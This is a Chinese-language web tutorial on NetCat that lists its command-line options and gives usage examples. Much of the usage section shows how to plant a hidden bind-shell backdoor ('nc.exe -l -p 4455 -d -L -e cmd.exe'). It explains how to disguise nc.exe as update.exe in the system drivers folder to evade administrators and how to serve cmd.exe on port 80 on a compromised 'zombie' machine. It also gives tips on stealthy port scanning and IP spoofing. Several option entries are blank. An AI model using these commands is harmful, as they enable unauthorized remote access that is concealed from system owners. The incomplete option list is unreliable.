時(shí)間:2015-06-28 00:00:00 來(lái)源:IT貓撲網(wǎng) 作者:網(wǎng)管聯(lián)盟 我要評(píng)論(0)
在入侵中它是最經(jīng)典的工具之一 ,NetCat被所有的網(wǎng)絡(luò)安全愛(ài)好者和研究者稱(chēng)之為瑞士軍刀,通過(guò)名字大家就能知道他的功能足夠豐富。
nc的全稱(chēng)為NetCat,它能夠建立并接受傳輸控制協(xié)議(TCP)和用戶(hù)數(shù)據(jù)報(bào)協(xié)議(UDP)的連接,Netcat可在這些連接上讀寫(xiě)數(shù)據(jù),直到連接關(guān)閉為止。它可以通過(guò)手工或者腳本與應(yīng)用層的網(wǎng)絡(luò)應(yīng)用程序或服務(wù)進(jìn)行交互。從技術(shù)上來(lái)講,NetCat并不能產(chǎn)生UDP連接,因?yàn)閁DP是一種無(wú)連接的協(xié)議。NetCat沒(méi)有圖形界面,很粗糙,很原始。
nc可以通過(guò)很多途徑下載得到,unix和Winodws平臺(tái)下的官方站點(diǎn)是:http://www.atsake.com/research/tools/network_utilities.
nc的命令行
nc的基本命令行形式是 nc [options] host ports,其中host是要掃描的主機(jī)名或IP地址,ports要么是一個(gè)單獨(dú)的端口,要么是一個(gè)端口范圍(用m-n的形式指定),要么是一系列用空格隔開(kāi)的單個(gè)端口。
-d? 只對(duì)Windows操作系統(tǒng)有用,該選項(xiàng)使NetCat以隱蔽模式工作,從而脫離MS-DOS命令提示符下環(huán)境運(yùn)行,使得nc不需要保持打開(kāi)命令窗口便可在監(jiān)聽(tīng)模式下運(yùn)行,也可以幫助黑客很好地隱藏監(jiān)聽(tīng)NetCat實(shí)例而不被系統(tǒng)管理員發(fā)現(xiàn)。
-e
-i
-g
-G該選項(xiàng)讓用戶(hù)在-g選項(xiàng)所指定的路由列表中指定的一個(gè)地址作為當(dāng)前的下一路由,由于IP地址為4字節(jié)大小(IPV4),所以這個(gè)參數(shù)總是4字節(jié)的倍數(shù);例如,4代表路由表中的第一個(gè)IP地址,8代表第二個(gè)IP地址,依次類(lèi)推。這在偽造部分源路由表使得報(bào)文看起來(lái)相當(dāng)?shù)挠杏谩T谶M(jìn)行欺騙和源路由時(shí),這個(gè)功能有助于屏蔽你的位置,但也不一定能接收到響應(yīng)報(bào)文,因?yàn)轫憫?yīng)報(bào)文將經(jīng)過(guò)由偽造的IP地址反路由回來(lái)。
-l 該選項(xiàng)切換nc的監(jiān)聽(tīng)模式。此選項(xiàng)必須與-p選項(xiàng)一起使用以告訴nc綁定某個(gè)指定的TCP端口并等待到來(lái)的連接。若換成-u選項(xiàng),則應(yīng)使用UDP端口而非TCP端口。
-L 該選項(xiàng)在Windows版本中有用,當(dāng)一個(gè)連接被關(guān)閉后,使用相同的命令行選項(xiàng)進(jìn)行重啟監(jiān)聽(tīng)模式,即使此時(shí)初始的連接已經(jīng)結(jié)束,nc也能在不需要用戶(hù)干涉的情況下接收后面新的連接。與-l一樣,必須與-p同時(shí)使用。
-n 該選項(xiàng)告訴我們nc不做任何主機(jī)名查找的工作。
-0
-p
-r 該參數(shù)使nc可以隨機(jī)選擇本地和遠(yuǎn)程端口。當(dāng)使用nc在系統(tǒng)中范圍很大的一批端口上獲取信息時(shí),要想混合源端口和目標(biāo)端口的順序看起來(lái)不怎么象端口掃描,這個(gè)選項(xiàng)是很有用的。當(dāng)這個(gè)選項(xiàng)與-i選項(xiàng)和一個(gè)足夠大的間隔結(jié)合使用的時(shí)候,在不被注意的端口掃描成功幾率能得到很大提升。
-s 指定nc建立連接時(shí)所使用的IP地址,該選項(xiàng)允許黑客做一些工作,它允許黑客隱藏他們的IP地址或假冒他人的IP地址,但是要得到路由到他們所欺騙的地址的任何信息,都需要使用-g源路由選項(xiàng)。其次,當(dāng)處于監(jiān)聽(tīng)模式時(shí),大多數(shù)情況下都可以與一個(gè)已經(jīng)監(jiān)聽(tīng)的服務(wù)"預(yù)先綁定",所有TCP和UDP服務(wù)都綁定到某個(gè)端口。
-t 如果使用telnet選項(xiàng)編譯,nc就可以與telnet服務(wù)器進(jìn)行telnet選項(xiàng)協(xié)商,雖然它的響應(yīng)是毫無(wú)意義的信息,但可以通過(guò)該狀態(tài)看到連接23端口的信息。
-u nc使用UDP而非TCP,在客戶(hù)模式和監(jiān)聽(tīng)模式下都起作用。
-v 控制nc將要做的事情達(dá)到的程度,如使用nc -v,那么nc將僅吐出它所接收到的數(shù)據(jù),一個(gè)單獨(dú)的-v可以知道它連接或綁定的地址是否有問(wèn)題發(fā)生,第2個(gè)-v可以讓nc在一個(gè)連接結(jié)束的時(shí)候讓你知道這個(gè)連接總共發(fā)送和接收了多少數(shù)據(jù)。
-w
nc的具體使用
c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隱藏一個(gè)NetCat后門(mén)。
c:\nc.exe -p 4455 -d -L -e cmd.exe 這個(gè)命令可以讓黑客利用NetCat重新返回系統(tǒng),直到系統(tǒng)管理員在任務(wù)管理器中看見(jiàn)nc.exe在運(yùn)行,從而發(fā)現(xiàn)這個(gè)后門(mén),我們一樣可以把它做的更加隱蔽,
c:\move nc.exe c:\windows\system32\Drivers\update.exe
c:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe
系統(tǒng)管理員可能把特權(quán)附屬于一些無(wú)害的程序,如update.exe等,黑客也可以隱藏命令行。
c:\windows\systme32\drivers\update.exe
cmd line: -l -p 4455 -d -L -e cmd.exe
c:\>
nc -l - p 80? 監(jiān)聽(tīng)80端口
nc -l -p 80 >c:\log.dat? 監(jiān)聽(tīng)80端口,并把信息記錄到log.dat中
nc -v -l -p 80? 監(jiān)聽(tīng)80端口,并顯示端口信息
nc -vv -l -p 80 監(jiān)聽(tīng)80端口,顯示更詳細(xì)的端口信息
nc -l -p 80 -t -e cmd.exe監(jiān)聽(tīng)本地的80端口的入站信息,同時(shí)將cmd.exe重定向到80端口,當(dāng)有人連接的時(shí)候,就讓cmd.exe以telnet的形式應(yīng)答。當(dāng)然這個(gè)最好用在控制的肉雞上。
nc -v ip port 掃瞄某IP的某個(gè)端口
nc -v -z ip port-port掃描某IP的端口到某端口
nc -v -z -u ip? port-port掃描某IP的某UDP端口到某UDP端口
關(guān)鍵詞標(biāo)簽:nc,網(wǎng)絡(luò)安全,瑞士軍刀
相關(guān)閱讀
熱門(mén)文章 火絨安全軟件開(kāi)啟懸浮窗的方法-怎么限制和設(shè)置軟件網(wǎng)速 火絨安全軟件怎么攔截廣告-火絨設(shè)置廣告攔截的方法 網(wǎng)絡(luò)安全管理軟件-PCHunter使用教程 騰訊QQ密碼防盜十大建議
人氣排行 火絨安全軟件開(kāi)啟懸浮窗的方法-怎么限制和設(shè)置軟件網(wǎng)速 火絨安全軟件怎么攔截廣告-火絨設(shè)置廣告攔截的方法 網(wǎng)絡(luò)安全管理軟件-PCHunter使用教程 xp系統(tǒng)關(guān)閉445端口方法_ 教你如何關(guān)閉xp系統(tǒng)445端口 什么是IPS(入侵防御系統(tǒng)) 企業(yè)網(wǎng)絡(luò)安全事件應(yīng)急響應(yīng)方案 ARP協(xié)議的反向和代理 Windows Server 2008利用組策略的安全設(shè)置